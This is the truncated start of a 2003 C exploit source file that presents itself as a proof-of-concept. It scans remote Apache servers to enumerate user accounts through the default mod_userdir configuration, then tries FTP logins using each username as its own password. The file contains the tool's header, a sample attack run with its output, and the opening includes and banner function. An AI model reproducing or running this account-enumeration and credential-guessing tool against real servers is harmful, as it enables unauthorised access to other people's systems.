/* m00-apache-w00t.c
*
* Apache 1.3.*-2.0.48 remote users disclosure exploit by m00 Security.
* ~ Proof-of-Concept edition ~
*
* This tool scans remote hosts running httpd (apache) and discloses
* information about existing user accounts via a wrong default
* configuration of mod_userdir (default apache module). It then attempts
* to log on to ftp with the logins found.
*
* Works only against Linux and *BSD boxes.
* Info: http://archives.neohapsis.com/archives/vuln-dev/2000-q3/0065.html
* This is an old, but currently still relevant, problem, because 99% of all
* admins use the default configuration of the apache http server.
*
* -d4rkgr3y
*
* sh-2.05b$ ./m00-apache-w00t -t localhost -u test_userlist.txt -b
*
* [*] Apache 1.3.*-2.0.48 remote users disclosure exploit by m00 Security.
*
* [*] Checking http server [localhost:80]...
* Apache => yes
* Vulnerable => yes
* OS => Mandrake Linux
* [*] Searching for system accounts...
* sergey =>
* m00 =>
* satan => yes
* evil =>
* poison =>
* god =>
* guest =>
* dima =>
* ftp => yes
* vasya =>
* rst =>
* vasi =>
* [*] Searching complete.
* 12 users checked
* 2 users found
* [*] Attempting to log on ftp with login:login...
* satan:satan => no
* ftp:ftp => no
* [*] Complete.
* 0 ftp accounts found
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#define DEFAULT_HTTP_PORT 80
#define DEFAULT_FTP_PORT 21
int m00() {
printf("\n[*] Apache 1.3.*-2.0.48 remote users disclosure exploit by m00 Security.\n\n");
/* securitydot.net - 2003-12-06 */